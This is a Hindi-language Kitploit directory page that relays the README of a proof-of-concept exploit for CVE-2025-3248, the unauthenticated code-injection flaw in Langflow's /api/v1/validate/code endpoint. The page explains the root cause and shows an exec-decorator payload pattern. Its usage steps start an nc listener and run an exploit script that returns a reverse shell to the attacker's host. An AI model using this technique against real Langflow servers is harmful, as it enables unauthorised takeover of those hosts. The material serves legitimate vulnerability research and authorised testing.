Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-3248-Langflow-RCE — CVE-2025-3248 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Langflow में एक अनप्रमाणित रिमोट कोड निष्पादन भेद्यता है, जो /api/v1/validate/code एंडपॉइंट के माध्यम से कोड इंजेक्शन का प्रदर्शन करता है। | Kitploit
उपकरण/GitHubGitHub/hideki233/cve-2025-3248-langflow-rce
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubhideki233/cve-2025-3248-langflow-rce

CVE-2025-3248-Langflow-RCE

CVE-2025-3248 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Langflow में एक अनप्रमाणित रिमोट कोड निष्पादन भेद्यता है, जो /api/v1/validate/code एंडपॉइंट के माध्यम से कोड इंजेक्शन का प्रदर्शन करता है।

रिपॉजिटरी देखें
16घं 12मि पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-3248 — Langflow अनप्रमाणित रिमोट कोड निष्पादन

CVE-2025-3248 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Langflow में एक अनप्रमाणित रिमोट कोड निष्पादन भेद्यता है, जो एक AI/LLM वर्कफ़्लो-निर्माण प्लेटफ़ॉर्म है।

  • प्रभावित संस्करण: Langflow < 1.3.0
  • फिक्स किया गया: 1.3.0 में
  • भेद्यता वर्ग: अनप्रमाणित RCE (CWE-94, कोड इंजेक्शन)
  • स्थिति: बॉटनेट द्वारा वास्तविक दुनिया में शोषण किए जाने के बाद CISA की ज्ञात शोषित भेद्यताओं की सूची में जोड़ा गया।

मूल कारण

Langflow एक एंडपॉइंट, POST /api/v1/validate/code उजागर करता है, जिसका उद्देश्य UI द्वारा सबमिट किए गए Python कोड के स्निपेट को "मान्य" करना है (जैसे कस्टम कंपोनेंट कोड)। आंतरिक रूप से यह ast.parse() / compile() के साथ कोड को पार्स और कंपाइल करता है और रिपोर्ट करता है कि यह मान्य है या नहीं — बिना किसी प्रमाणीकरण की आवश्यकता के।

बग: Python डेकोरेटर एक्सप्रेशन को पार्स/कंपाइल समय पर मूल्यांकन करता है, डेकोरेटेड फ़ंक्शन को कभी कॉल किए जाने से पहले। यदि सबमिट किया गया "मान्य करने के लिए कोड" में ऐसा डेकोरेटर होता है:

root@kitploit:~
@exec("...malicious code...")
def test():
    pass

तो exec(...) कॉल उसी क्षण चलता है जब कोड पार्स किया जाता है — मान्यता को वास्तव में test() को कॉल करने की कभी आवश्यकता नहीं होती। कोई प्रमाणीकरण नहीं और कोई सैंडबॉक्सिंग नहीं होने के साथ, Langflow चलाने वाले होस्ट पर मनमाने कमांड निष्पादित करने के लिए एक अनप्रमाणित HTTP अनुरोध पर्याप्त है।

उपयोग

  1. अपनी मशीन पर एक लिसनर शुरू करें:
    root@kitploit:~
    nc -lvnp 9001
    
  2. लक्ष्य के विरुद्ध PoC चलाएँ:
    root@kitploit:~
    python3 exploit.py --target http://TARGET_IP:7860 --lhost YOUR_IP --lport 9001
    
  3. यदि लक्ष्य भेद्य है, तो आपको लिसनर पर एक शेल मिलेगा।
root@kitploit:~
usage: exploit.py [-h] --target TARGET --lhost LHOST [--lport LPORT] [--timeout TIMEOUT]

आवश्यकताएँ

root@kitploit:~
pip install requests

अस्वीकरण

यह कोड केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण (लैब्स, CTFs, स्पष्ट लिखित अनुमति वाले अभियान) के लिए प्रदान किया गया है। इसे उन सिस्टमों के विरुद्ध न चलाएँ जिनके आप मालिक नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट प्राधिकरण नहीं है। लेखक दुरुपयोग के लिए ज़िम्मेदार नहीं है।

संदर्भ

  • Langflow सुरक्षा सलाहकार GHSA-vwmf-pq79-vjvx
  • Horizon3.ai — किसी भी गति पर असुरक्षित: Langflow AI में अनप्रमाणित RCE के लिए Python Exec का दुरुपयोग
  • Keysight — CVE-2025-3248: Langflow अनप्रमाणित कोड मान्यता
टूल डाउनलोड करें